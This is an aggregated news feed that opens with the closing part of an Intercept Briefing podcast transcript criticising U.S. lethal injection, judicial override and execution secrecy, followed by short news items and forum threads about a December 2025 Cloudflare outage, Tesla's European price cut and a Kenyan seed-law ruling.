MG: In that hearing, there’s this real incredible moment where one of the attorneys asks the man who heads Alabama’s Department of Corrections, did you ever consult with any medical personnel about the choice of execution method and its possible problems? And the guy says no.

You just realize, they’re just mailing it in. Like they have no — the state of Alabama is not interested in exploring the kind of full implications of what they’re doing. They’re just engaged in this kind of incredibly slapdash operation.

“It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.”

AL: Liliana, I wanna bring you in here. You’ve spent years reporting on capital punishment in the U.S. and looked into many cases in different states. Why are states like Florida and Alabama ramping up the number of executions? Is it all politics? What’s going on there?

LS: That is one of the questions that I think a lot of us who cover this stuff have been asking ourselves all year long. And to some degree, it’s always politics. The story of the death penalty, the story of executions, so often really boils down to that.

We are in a political moment right now where the climate around executions , certainly, but I think in general, the kind of appetite for or promotion of vengeance and brutality toward our enemies is really shockingly real right now. And I was reluctant about a year ago to really trace our current moment to Trump . The death penalty has been a bipartisan project ; I don’t want to pretend like this is something that begins and ends with somebody like Trump.

That said, it’s really shocking to see the number of executions that are being pushed through, especially in Florida. And this is something that has been ramped up by Gov. DeSantis for purely political reasons. This death penalty push in Florida began with his political ambitions when he was originally going to run for president. And I think that to some degree is a story behind a lot of death penalty policy, certainly going back decades, and certainly speaks to the moment we’re in.

I did want to just also touch on some of what Malcolm was talking about when it comes to the performance of executions themselves. Over the past many years, I’ve reported on litigation, death penalty trials, that have taken place in states like Oklahoma and here in Tennessee where I live, where we restarted executions some years ago after a long time of not carrying any out. And these trials had, at the center, the three-drug protocol that is described so thoroughly in the podcast.

It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look — using the tools of medicine to kill — and made to look like this has really been thought through. But when you really trace that history — as you do, Malcolm, in your podcast — there’s no there there.

These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science. There was no way to test these methods. Nobody can tell us, as you described in your podcast, what it feels like to undergo this execution process. And I think it’s really important to remember that this is not only the story of lethal injection, this is the story of executions writ large.

When the electric chair came on the scene generations ago, it was also touted as the height of technology because it was using electricity and it was supposed to be more humane than hanging. There had been botched hangings that were seen as gruesome ordeals. So there’s this bizarre way in which history repeats itself when it comes to these methods that are promoted as the height of modernity and humanity —and it’s just completely bankrupt and false.

AL: Malcolm, do you want to add something?

MG: Yeah, we have a big focus in the case I’m describing, Kenny Smith, was notorious because he had a botched execution where they couldn’t find a vein. And one of the points that Joel Zivot makes is that, of course, it’s not surprising that they, in that case and in many others, they can’t find a vein because that is a medical procedure that is designed to be undertaken in a hospital setting by trained personnel with the cooperation of the patient. Usually we’d find a vein, and the patient cooperates because we’re trying to save their life or make them healthier. This is a use of this procedure that is completely different. It is outside of a medical institution, not being done by people who are experienced medical professionals, and is not being done with the cooperation of the patient. The patient in this case is a condemned prisoner who is not in the same situation as someone who’s ill and trying to get better.

AL: I want to just walk our listeners through this. So this is, again, one of the pieces of the series, this three-drug protocol. First there’s a sedative, then there’s a paralytic, and then there’s finally potassium chloride, which is supposed to stop the heart. How did that protocol come to be developed?

MG: It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something “more humane.”

And their model was, well, why don’t we do for humans what we do with horses? Which was a suggestion that had come from Ronald Reagan, then governor of California. So they just generally thought, well, we can do a version of what we do in those instances, only we’ll just ramp up the dose. This is also a kind of anesthesia sometimes.

AL: This is advertised as something that is supposed to be painless.

MG: And these drugs were also in use in the medical setting, but their idea was, we’ll take a protocol that is loosely based on what is used in a medical setting and ramp up the doses so that instead of merely sedating somebody, we’re killing them.

“ It wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys.”

And it wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys, dreaming up something on the back of an envelope. And one of the guys, the medical examiner, later regretted his part in the whole procedure, but the genie was out of the bottle. And everybody jumped on this as an advance over the previous iteration of killing technology.

AL: In addition to being advertised as painless, it’s also supposed to be within the bounds of the Eighth Amendment protection against cruel and unusual punishment. Can you tell us about that?

MG: In order to satisfy that prohibition against cruel and unusual punishment, you have to have some insight as to what the condemned prisoner is going through when they are being subjected to this protocol. The universe of people engaged in the capital punishment project were universally indifferent to trying to find out how exactly this worked. They weren’t curious at all to figure out, for example, was there any suffering that was associated with this three-drug protocol, or which of the three drugs is killing you? Or, I could go on and on and on.

They just implemented it and because it looked good from the outside, because you have given someone a sedative and a paralytic, it’s impossible to tell from the outside whether they’re going through any kind of suffering. It was just assumed that there should be no, there must be no suffering going on the inside.

And the Eighth Amendment does not say that people should not be subjected to the appearance of cruel and unusual punishment. It says, no, the actual punishment itself for the individual should not be cruel and unusual. So there was, at no point could anyone, in the early history of this, did anyone truly satisfy the intent of the Eighth Amendment.

AL: Liliana, you’ve written a lot about this protocol as well, and the Supreme Court has taken a stance on it . Tell us about that.

LS: So one thing that’s really important to understand about the Eighth Amendment and the death penalty in this country is that the U.S. Supreme Court has weighed in on the death penalty numerous times, but has never invalidated a method of execution as violating the Eighth Amendment ban on cruel and unusual punishment. And that fact right there I think speaks volumes.

But one of the cases that I go back to over and over again in my work about lethal injection and about other execution methods, dates back to the 1940s, and it’s a case involving a man named Willie Francis, who was a teenager, a Black teenager who had been condemned to die in Louisiana. They sent him to the electric chair in 1946, and he survived. He survived their initial attempts to execute him. It’s a grotesque ordeal, there’s been a lot written historically about this.

That case, they stopped the execution. He appealed to the U.S. Supreme Court , and a majority of justices found that attempting to kill him again, wouldn’t violate the Eighth Amendment, and they sent him back in 1947, they succeeded in killing him. But the language that comes out of the court in this case really goes a long way to helping us understand how we ended up where we are now. They essentially said, “Accidents happen. Accidents happen for which no man is to blame.” And there’s another turn of phrase that’s really galling in which essentially they call this ordeal that he suffered “ an innocent misadventure .” And this language, this idea that this was an innocent misadventure finds its way into subsequent rulings decades later.

So in 2008, I believe it was, the U.S. Supreme Court took up the three-drug protocol, which at the time was being used by Kentucky. This was a case called Baze v. Rees . There was a lot of evidence, there was a lot that the justices had to look at that should have given them pause about the fact that this protocol was not rooted in science. That there had been many botched executions — in terms of the inability to find a vein, in terms of evidence that people were suffering on the gurney.

The U.S. Supreme Court upheld that protocol, and yet right around the time that they handed down that ruling, states began tinkering with the lethal injection protocol that had been the prevailing method for so long.

Without getting too deep in the weeds, the initial drug — the drug that was supposed to anesthetize people who were being killed by lethal injection — had been originally a drug called sodium thiopental , which was thought to be, believed to be, for good reasons something that could basically put a person under, where they wouldn’t necessarily feel the noxious effects of the subsequent drugs.

States were unable to get their hands on this drug for a number of reasons, and subsequently began swapping out other drugs to replace that drug. And different states tried different things. A number of states eventually settled on this drug called midazolam , which is a sedative, which does not have the same properties as the previous drug — and over and over again, experts have said that this is not a drug that’s going to be effective in providing and anesthetizing people for the purpose of lethal injection.

The Supreme Court once again ruled that this was true. In Oklahoma, this was the case Glossip v. Gross, which the Supreme Court heard after there had been a very high profile really gruesome, botched execution, a man named Clayton Lockett who was executed in 2014. This ended up going up to the Supreme Court. And I covered that oral argument and what was really astonishing about that oral argument wasn’t just how grotesque it all was, but the fact that the justices were very clearly, very annoyed, very cranky about the fact that, only a few years after having upheld this three-drug protocol, now they’re having to deal with this thing again. And again, they upheld this protocol, despite a lot of evidence that this was completely inhumane, that there was a lot of reason to be concerned that people were suffering on the gurney, while being put to death by lethal injection.

And so the reason I go back to the Willie Francis case is that it really tells us everything that we need to know. Which is that if you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country. And so the Supreme Court has weighed in not only on the three-drug protocol, but on execution methods in general. And they have always found that there’s not really a problem here.

“If you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country.’

MG: At a certain point, it becomes obvious that the cruelty is the point. The Eighth Amendment does not actually have any kind of impact on their thinking because they are anxious to preserve the very thing about capital punishment that is so morally noxious, which is that it’s cruel.

AL: Malcolm, one interesting thing that you talk about in this series is this concept of judicial override in Alabama, where a judge was able to impose a death sentence even if the jury recommended life in prison. This went on until 2017. As we know, death penalty cases can take decades, so it’s possible that there are still people on death row who have been impacted by judicial override. What’s your sense about how judges who went that route justified their decisions, if at all?

MG: So Alabama was one of a small number of states who, in response to the Supreme Court’s hesitancy about capital punishment in the 1970s, instituted rules which said that a judge can override a jury’s sentencing determination in a capital case.

So if a jury says, “We want life imprisonment without parole,” the judge could impose a death penalty or vice versa. The motivation for these series of override laws — and there are only about three or four states in Florida, Alabama, a couple of others had them — is murky. But I suspect what they wanted to do was to guard against the possibility that juries would become overwhelmingly lenient.

The concern was that if the public sentiment was moving away from death penalty to the extent that it would be difficult to impose a death penalty in capital cases, unless you allowed judges to independently assert their opinion when it came to sentencing. And I also suspect that there’s, in states like Alabama, there was a little bit of a racial motivation that they thought that Black juries would be unlikely to vote for the death penalty for Black defendants, and they wanted to reserve the right to act in those cases.

And what happens in Alabama is that other states gradually abandon this policy, but Alabama sticks to it — not only that, they have the most extreme version of it. They basically allow the judge to overrule under any circumstances without giving an explanation for why.

And when they finally get rid of this, they don’t make it retroactive. So they only say, “Going forward, we’re not going to do override. But we’re not going to spare people who are on death row now because of override — we’re not going to spare their lives.” And so it raises this question about, the reason we call our series “The Alabama Murders” is that when you look very closely at the case we’re interested in, you quickly come to the conclusion there’s something particularly barbaric about the political culture of Alabama. Not news, by the way, for anyone who knows anything about Alabama. But Alabama, it’s its own thing, and they remain to this day clinging to this notion that they need every possible defense against the possibility that a convicted murderer could escape with his life.

AL: Speaking of this idea of the title of the show, I also want to bring up that I did not know that the autopsy in an execution, and I don’t know that this is unique to Alabama, but that it marks the death as a homicide. I was actually shocked to hear that.

MG: Yeah, isn’t that interesting? That is the one moment of honesty and self-awareness in this entire process.

AL: Right, that’s why it’s shocking. It’s not shocking because we know it’s a homicide. It’s shocking because they’re admitting to it in a record that is accessible to the public at some point.

[Break]

AL: Malcolm, you mentioned the racial dynamic with Alabama in particular, but Liliana, I want to ask if you could maybe speak to the historic link between the development of the death penalty and the history of lynching in the South.

LS: So it’s really interesting. Alabama is, in many ways, the poster child for this line that can be drawn between not only lynching, but slavery to lynching, to Reconstruction, to state-sanctioned murder. And that’s an uneasy line to draw in the sense of — there’s a reason that Bryan Stevenson, who is the head of the Equal Justice Initiative, has called the death penalty the “stepchild of lynching.”

He calls it the stepchild of lynching and it’s because, there’s something of an indirect link, but it’s an absolutely — that link is real. And you really see it in Alabama and certainly in the South. I think it was in 2018, I went down to Montgomery a number of times for the opening of EJI’s lynching memorial that they had launched there and this was a major event. At the time I went with this link in mind to try to interrogate and understand this history a little bit better. And I ended up writing this big long piece, which I only recently went back to reread because it’s not fresh in my mind anymore.

But one of the things that is absolutely, undoubtedly true is that the death penalty in the South in its early days was justified using the exact same rationale that people used for lynching, which was that this was about protecting white women from sexually predatory Black men.

“The death penalty in the South in its early days was justified using the exact same rationale that people used for lynching.”

And that line, that consistent feature of executions — whether it was an extrajudicial lynching or an execution carried out by the state — has been really consistent and I think overlooked in the history of the death penalty. And part of the reason it’s overlooked is that, again, going back to the Supreme Court, there have been a number of times that this history has come before the Supreme Court and other courts, and by and large, the reaction has been to look away, to deny this.

That is absolutely true in the years leading up to the 1972 case, Furman v. Georgia , which Malcolm alluded to earlier, there was this moment where the Supreme Court had to pause executions. And this was a four-year period in the ’70s. 1972 was Furman v. Georgia. 1976 was Gregg v. Georgia. Part of the reason that Furman, which was this 1972 case, invalidated the death penalty across the country, was because there was evidence that executions, that death sentences were being handed down in what they called an arbitrary way.

And in reality, it wasn’t so much arbitrariness, as very clear evidence of sentences that were being given disproportionately to people of color, to Black people, and history showed that that was largely motivated by cases in which a victim was white. It was a white woman maybe who had been subjected to sexual violence. There is that link, and I think it’s really important to remember that.

In Alabama, one of the really interesting things too, going back to judicial override, there’s this kind of irony in the history of judicial override in the way that it was carried out by judges. Alabama, when they restarted the death penalty in the early ’80s, was getting a lot of flack for essentially having a racist death penalty system. Of course, there was a lot of defensiveness around this, and there were judges who, actually, in cases where juries did not come back with a death sentence for a white defendant, there were cases where judges then overrode that decision in a sort of display of fairness.

One of the things that I found when I was researching my piece from 2018 was that there was a judge in, I believe it was 1999, who explained why he overrode the jury in sentencing this particular white man to die. And he said, “If I had not imposed the death sentence, I would’ve sentenced three Black people to death and no white people.” So this was his way of ensuring fairness. “Well, I’ve gotta override it here,” never mind what it might say about the jury in the decision not to hand down a death sentence for a white person.

“They needed the appearance of fairness.”

Again, it goes back to appearance. They needed the appearance of fairness. And so Alabama really does typify a certain kind of racial dynamic and early history of the death penalty that you see throughout the South, not just the South, but especially in the South.

AL: One of the things proponents of the death penalty are adamant about is that it requires some element of secrecy to survive.

Executions happen behind closed walls, in small rooms, late at night. The people involved never have their identities publicly revealed or their credentials. The concern being that if people really knew what was involved, there would be a massive public outcry. Malcolm, in this series you describe in gruesome detail what is actually involved in an execution. For folks who haven’t heard the series, tell us about that.

MG: In Alabama, there is a long execution protocol. A written script, which was made public only because it came out during a lawsuit, which kind of lays out all the steps that the state takes. And Alabama also has, to your point, an unusual level of secrecy.

For example, in many states, the entire execution process is open, at least to witnesses. In Alabama, you only see the person after they’ve found a vein. So the Kenny Smith case, we were talking about where they spent hours unsuccessfully trying to find a vein — that was all done behind closed doors.

And the second thing that you pointed out is the people who are involved remain anonymous, and you can understand why. It is an acknowledgment on the part of these states that they are engaged in something shameful. If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?

But instead, they go in the opposite direction and they try and shroud it. They make it as much of a mystery as they can. And it’s funny, so much of our knowledge about death penalty procedures only comes out because of lawsuits.

“If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?”

It is only under the compulsion of the judicial process that we learn even the smallest tidbit about what’s going on or what kind of thought went into a particular procedure. When we’re talking about the state taking the life of a citizen of the United States, that’s weird, right?

We have more transparency over the most prosaic aspects of government practice than we do about something that involves something as important as taking someone’s life.

AL: Liliana, you’ve witnessed two executions. Tell us about your experience, and particularly this aspect of secrecy surrounding the process.

LS: Let me just pick up first on the secrecy piece because one of the really bizarre aspects of the death penalty, when you’ve covered it in different states and looked at the federal system as well, is that there’s just this wide range when it comes to what states and jurisdictions are willing to reveal and show.

What they are not willing to reveal is certainly the individuals involved. A ton of states have or death penalty states have passed secrecy legislation essentially bringing all of that information even further behind closed doors. The identity of the executioners was always sort of a secret. But now we don’t get to know where they get the drugs , and in some states, in some places, the secrecy is really shocking. I just wrote a story about Indiana, which recently restarted executions . And Indiana is the only active death penalty state that does not allow any media witnesses. There is nothing, and that’s exceptional.

And if you go out and try as a journalist to cover an execution in Indiana, it’s not going to be like in Alabama or in Oklahoma, where the head of the DOC comes out and addresses things and says, whether true or not true, “Everything went great.” No, you are in a parking lot at midnight across from the prison. There is absolutely nobody coming to tell you what happened. It’s a ludicrous display of indifference and contempt, frankly, for the press or for the public that has a right and an interest in knowing what’s happening in their names. So secrecy — there’s a range, I guess is my point, and yes, most places err on the side of not revealing anything, but some take that a lot further than others.

In terms of the experience of witnessing an execution, that’s obviously a big question. I will say that both those executions were in Oklahoma. That is a state that has a really ugly sordid history of botched executions going back longer than 10 years .

But Oklahoma became infamous on the world stage about 10 years ago, a little more, for botching a series of executions. I’ve been covering the case of Richard Glossip for a while. Richard Glossip is a man with a long-standing innocence claim whose death sentence and conviction was overturned only this year. Richard Glossip was almost put to death by the state of Oklahoma in 2015, and I was outside the prison that day. And it’s only because they had the wrong drug on hand that it did not go through.

And so going into a situation where I was preparing to witness an execution in Oklahoma, I was all too keenly aware of the possibility that something could go wrong — and that’s just something you know when you’re covering this stuff. And instead, Oklahoma carried out the three-drug protocol execution of a man named Anthony Sanchez in September of 2023. I had written about Anthony’s case. I had spoken to him the day before and for the better part of a year. And I think I’m still trying to understand what I saw that day because, by all appearances, things looked like they went as smoothly as one would hope, right?

He was covered with a sheet. You saw the color in his face change. He went still. And as a journalist or just an ordinary person trying to describe what that meant, what I was seeing — I couldn’t really tell you, because the process by design was made to look that way, but I could not possibly guess as to what he was experiencing.

Again, that’s because lethal injection and that three-drug protocol has been designed to make it look humane and make it look like everything’s gone smoothly.

I will say one thing that has really stuck with me about that execution was that I was sitting right behind the attorney general of Oklahoma, Gentner Drummond, who has attended — I think to his credit, frankly — every execution that has been carried out in Oklahoma under his tenure. And he was sitting in front of me and a member of the one witness who was there, who, I believe, was a member of Anthony’s family was sitting one seat over. After the execution was over, she was quietly weeping, and Gentner Drummond, the attorney general who was responsible for this execution, put his hand on her and said, “I’m sorry for your loss.” And it was this really bizarre moment because he was acknowledging that this was a loss, that this death of this person that she clearly cared about — he was responsible for it.

And I don’t know that he has ever said something like that since, because a lot of us journalists in the room reported back. And it’s almost like, you’re not supposed to say that — there shouldn’t be sorrow here, really. This is justice. This is what’s being done in our name. And I’m still trying to figure out how I feel about that. Because by and large in the executions I’ve reported on, you don’t have the attorney general himself or the prosecutor who sent this person to death row attending the execution. It’s out of sight, out of mind.

AL: Malcolm, as we’ve talked about and has been repeatedly documented, the way that the death penalty has been applied has been racist and classist, disproportionately affecting Black and Latino people and poor people. It has also historically penalized people who have mental health issues or intellectual disabilities . Even with all that evidence, why does this persist? How has vengeance become such a core part of the American justice system?

MG: As I spoke before, I think what’s happened is that the people who are opposed to death penalty are having a different conversation than the people who are in favor of it.

The people who are in favor are trying to make a kind of moral statement about society’s ultimate intolerance of people who violate certain kinds of norms, and they are in the pursuit of that kind of moral statement, willing to go to almost any lengths. And on the other side are people who are saying that going this far is outside of the moral boundaries of a civilized state.

Those are two very different claims that proceed on very different assumptions. And we’re talking past each other. It doesn’t matter to those who are making a broad moral statement about society’s intolerance what this condition, status, background, makeup of the convicted criminal is — because they’re not basing their decision on the humanity of the defendant, the criminal defendant. They’re making a broad moral point.

“I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem.”

I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem. That if opponents make it all about the individual circumstances of the defendant, the details of the case, was the person guilty or not, was the kind of punishment cruel and unusual — we’re kind of buying into the moral error here.

Because we’re opening the possibility that if all we were doing was executing people who were 100% guilty and if our method of execution was proven without a shadow of a doubt to be “humane,” then we don’t have a case anymore.

AL: Right, then it’d be fine.

MG: So I look at what I’ve done — that’s my one reservation about spending all this time on the Kenny Smith case, is that we shouldn’t have to do this. It should be enough to say that even the worst person in the world does not deserve to be murdered by a state.

That’s not what states do, right, in a civilized society. That one sentence ought to be enough. And it’s a symptom of how distorted this argument has become — that it’s not enough.

AL: Liliana, I want to briefly get your thoughts on this too.

LS: I think that people who are opposed to death penalty and abolitionists oftentimes say, “This is a broken system.” And we talk about prisons in that way; “this is a broken system.”

I think it’s a mistake to say that this is a broken system because I don’t think that this system, at its best, as you’ve just discussed, would be fine if it only worked correctly. I think that that’s absolutely not the case. So I do agree that, this system — I don’t hide the fact that I’m very opposed to the death penalty. I don’t think that you can design it and improve it and make it fair and make it just.

“I don’t think that you can design it and improve it and make it fair and make it just.”

I also think that part of the reason that people have a hard time saying that is: If you were to say that about the death penalty in this country, for all of the reasons that may be true, then you would be forced to deal with the criminal justice system more broadly , and with prisons and sentencing as a whole. And I think that there’s a real reluctance to see the problems that we see in death penalty cases in that broader context, because what does that mean for this country, if you’re calling into question on mass incarceration and in the purpose that these sentences serve.?

AL: We’ve covered a lot here. I want to thank you both for joining me on the Intercept Briefing.

MG: Thank you so much.

LS: Thank you.

Another Cloudflare outage takes down websites including LinkedIn and Zoom

Guardian
www.theguardian.com
2025-12-05 10:58:47
Web infrastructure provider says it has implemented a fix after users had seen ‘a large number of empty pages’ A host of websites including LinkedIn, Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare. Cloudflare said shortly after 9am UK time that it was “invest...
Original Article

A host of websites including LinkedIn , Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare.

Cloudflare said shortly after 9am UK time that it was “investigating issues with Cloudflare Dashboard and related APIs”, referring to application programming interfaces.

The internet infrastructure provider said users had seen “a large number of empty pages” as a result. It added shortly after that it had implemented a potential fix and was monitoring the results.

A number of websites and platforms were down, including the Downdetector site used to monitor online service issues. Users reported problems with other websites including Zoom , LinkedIn, Shopify and Canva, although many are back online.

The Downdetector website recorded more than 4,500 reports related to Cloudflare after returning online.

The Indian-based stockbroker Groww said it was facing technical issues “due to a global outage at Cloudflare”. Its services have since been restored.

Cloudflare provides network and security services for many online businesses to help their websites and applications operate. It claims that about 20% of all websites use some form of its services.

It comes only three weeks after previous problems at Cloudflare hit the likes of X, ChatGPT, Spotify, and multiplayer games such as League of Legends.

skip past newsletter promotion

Jake Moore, a global cybersecurity adviser at ESET, said: “If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable. The problems often lie with the fact we are using an old network to direct internet users around the world to websites, but it simply highlights there is one huge single point of failure in this legacy design.”

Tesla cuts Model 3 price in Europe as sales slide amid Musk backlash

Guardian
www.theguardian.com
2025-12-05 10:55:10
CEO Elon Musk says lower-cost electric car will reignite demand by appealing to broader range of buyers Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric veh...
Original Article

Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric vehicles.

Musk, the electric car maker’s chief executive, has argued that the cheaper option, launched in the US in October, will reinvigorate demand by appealing to a wider range of buyers.

The new Model 3 Standard is listed at €37,970 (£33,166) in Germany, 330,056 Norwegian kroner (£24,473) and 449,990 Swedish kronor (£35,859). The move follows the launch of a lower-priced Model Y SUV , Tesla’s bestselling model, in Europe and the US.

Tesla sales have slumped across Europe as the company faces increasingly tough competition from its Chinese rival BYD, which outsold the US electric vehicle maker across the region for the first time in spring.

Sales across the EU have also been hurt by a buyer backlash against Musk’s support for Trump’s election campaign and period working in the president’s administration.

In his role running the “department of government efficiency”, or Doge, the tech billionaire led sweeping job cuts , but quit in May and after falling out with Trump over the “big, beautiful” tax and spending bill.

Musk has also alienated customers through other controversial political interventions, including appearing to give a Nazi salute at Trump’s victory rally, showing support for Germany’s far-right AfD party , and accusing Keir Starmer and other senior UK politicians of covering up the scandal about grooming gangs .

New taxes on electric cars in last month’s budget could undermine UK demand, critics have said. UK electric car sales grew at their slowest rate in two years in November, at just 3.6%, according to figures from the Society of Motor Manufacturers and Traders (SMMT).

“[This] should be seen as a wake-up call that a sustained increase in demand for EVs cannot be taken for granted,” said Mike Hawes, the chief executive of the SMMT. “We should be taking every opportunity to encourage drivers to make the switch, not punishing them for doing so.”

The chancellor’s new pay-per-mile road tax on EVs will charge drivers 3p for every mile from April 2028, costing motorists about £250 a year on average.

What are you doing this weekend?

Lobsters
lobste.rs
2025-12-05 10:54:28
Feel free to tell what you plan on doing this weekend and even ask for help or feedback. Please keep in mind it’s more than OK to do nothing at all too!...
Original Article

Feel free to tell what you plan on doing this weekend and even ask for help or feedback.

Please keep in mind it’s more than OK to do nothing at all too!

The US polluters that are rewriting the EU's human rights and climate law

Hacker News
www.somo.nl
2025-12-05 09:58:01
Comments...

Cloudflare down, websites offline with 500 Internal Server Error

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 09:12:15
Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare is investigating the reports. [...]...
Original Article

Cloudflare

Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare has confirmed that it's investigating the reports.

Cloudflare, a service that many websites use to stay fast and secure, is currently facing problems.

Because of this, people visiting some websites are seeing a “500 Internal Server Error” message instead of the normal page.

Cloudflare down
Cloudflare outage takes down DownDetector

A 500 error usually means something went wrong on the server side, not on the user’s device or internet connection.

In an update to its status page, Cloudflare says it's investigating issues with Cloudflare Dashboard and related APIs.

"Customers using the Dashboard / Cloudflare APIs are impacted as requests might fail and/or errors may be displayed," the company noted.

Cloudflare says it has implemented a fix, and websites should start coming back online soon.

This is a developing story....

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Kenyan court declares law banning seed sharing unconstitutional

Hacker News
apnews.com
2025-12-05 09:09:25
Comments...
Original Article

KISUMU, Kenya (AP) — A high court in Kenya on Thursday declared unconstitutional sections of a seed law that prevented farmers from sharing and selling indigenous seeds in what food campaigners have called a landmark win for food security.

Farmers in Kenya could face up to two years’ imprisonment and a fine of 1 million Kenya shillings ($7,700) for sharing seeds through their community seed banks, according to a seed law signed in 2012.

Justice Rhoda Rutto on Thursday said sections of the seed law that gave government officials powers to raid seed banks and seize seeds were also unconstitutional.

The law was introduced as a measure to curb growing sale of counterfeit seeds that were causing loses in the agricultural sector and gave sole seed trading rights to licensed companies.

The case had been filed by 15 smallholder farmers, who are members of community seed banks that have been in operation for years, preserving and sharing seeds among colleagues.

A farmer, Samuel Wathome, who was among the 15, said the old farming practices had been vindicated.

“My grandmother saved seeds, and today the court has said I can do the same for my grandchildren without fear of the police or of prison,” he said.

Elizabeth Atieno, a food campaigner at Greenpeace Africa, called the win a “victory for our culture, our resilience, and our future.”

“By validating indigenous seeds, the court has struck a blow against the corporate capture of our food system. We can finally say that in Kenya, feeding your community with climate-resilient, locally adapted seeds is no longer a crime,” she said.

Food campaigners have in the past encouraged governments to work with farmers to preserve indigenous seeds as a way of ensuring food security by offering farmers more plant varieties.

Indigenous seeds are believed to be drought resistant and adaptable to the climate conditions of their native areas, and hence often outperform hybrid seeds.

Kenya has a national seed bank based near the capital Nairobi where indigenous seeds are stored in cold rooms, but farmers say community seed banks are equally important for variety and proximity to the farmer.

The country has faced challenges in the seed sector where counterfeit seeds were sold to farmers, leading to losses amounting to millions of shillings in a country that relies on rain-fed agriculture.

Cloudflare Is Down

Hacker News
cloudflare.com
2025-12-05 08:59:00
Comments...
Original Article

Our connectivity cloud is the best place to
  • connect your users, apps, clouds, and networks
  • protect everything you connect to the Internet
  • build and scale applications

Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.

Connect your people, apps and AI agents

Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.

Speak to sales about SASE to modernize your network and secure your workspace.

No options

Select your job level... *

No options

Select your job function... *

No options

Bolivia, Plurinational State of

Bonaire, Sint Eustatius and Saba

British Indian Ocean Territory

Congo, the Democratic Republic of the

Falkland Islands (Malvinas)

French Southern Territories

Heard Island and McDonald Islands

Holy See (Vatican City State)

Lao People's Democratic Republic

Macedonia, the former Yugoslav Republic of

Saint Helena, Ascension and Tristan da Cunha

Saint Martin (French part)

Saint Pierre and Miquelon

Saint Vincent and the Grenadines

Sint Maarten (Dutch part)

South Georgia and the South Sandwich Islands

Tanzania, United Republic of

Venezuela, Bolivarian Republic of

Learn more

Related

Protect and accelerate websites and AI-enabled apps

Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.

Related

Build and secure AI agents

Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.

Related

One global cloud network unlike any other

Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.

60+

cloud services available globally

234B

cyber threats blocked each day

20%

of all websites are protected by Cloudflare

330+

cities in 125+ countries, including mainland China

Cloudflare Stats

Leading companies rely on Cloudflare

Connect

Protect

Build

How Cloudflare can help

Performance acceleration bolt

Accelerate website performance

Security shield protection

Block bot traffic

Block bot traffic

Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.

Optimize Video Experience

Optimize video experiences

Deploy Severless Code Icon

Deploy serverless code

Deploy serverless code

Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.

Deploy AI on the Edge Icon

Deploy AI on the edge

Eliminate Egress Fee for Object Storage

Eliminate egress fee for object storage

News and resources

What's new

Insights

Library

Events

Get started with the connectivity cloud

Security Shield Protection Icon

Get started for free

Get easy, instant access to Cloudflare security and performance services.

Start for free
Constellation Icon

Need help choosing?

Get a personalized product recommendation for your specific needs.

Find the right plan
Innovation Thinking Icon

Talk to an expert

Have questions or want to get a demo? Get in touch with one of our experts.

Contact us

Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?

Hacker News
news.ycombinator.com
2025-12-05 08:55:47
Comments...
Original Article
Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?
18 points by dfasoro 30 minutes ago | hide | past | favorite | 4 comments

I was writing a blogpost on Medium and I noticed errors, tried to open LinkedIn? down. tried downdetector? down. Claude.ai is also down



I'm getting a lot of errors on a lot of pages from cf.



Yep, just went back up and then down again. Let's not put all eggs in one basket...


Cloudflare RIP

Cloudflare Down Again – and DownDetector Is Also Down

Hacker News
news.ycombinator.com
2025-12-05 08:51:42
Comments...
Original Article

https://downdetectorsdowndetectorsdowndetectorsdowndetector.... reports that https://downdetectorsdowndetectorsdowndetector.com/ is down, guessing downdetectorsdowndetectorsdowndetector runs via cloudflare!



This is art



You know what, maybe AI is taking all the goddamn jobs


They pretty much said this. All the big companies that had recent outages are companies that publicly embraced vibe coding.



Time to use some local ai with Docker Model Runner :)

No cloudflare no problem

https://github.com/docker/model-runner


I assume this is why Claude stopped working


There are other LLMs you can ask to be absolutely, 100% sure.


downdetectors downdetector shows that downdector should not be down. Something is wrong here.

https://downdetectorsdowndetector.com/



Crunchyroll down too got me and the anime community stressed


LinkedIn down


i can confirm it down again



jesus fucking christ i just wanna play runescape


This made getting paged at 4am worth it

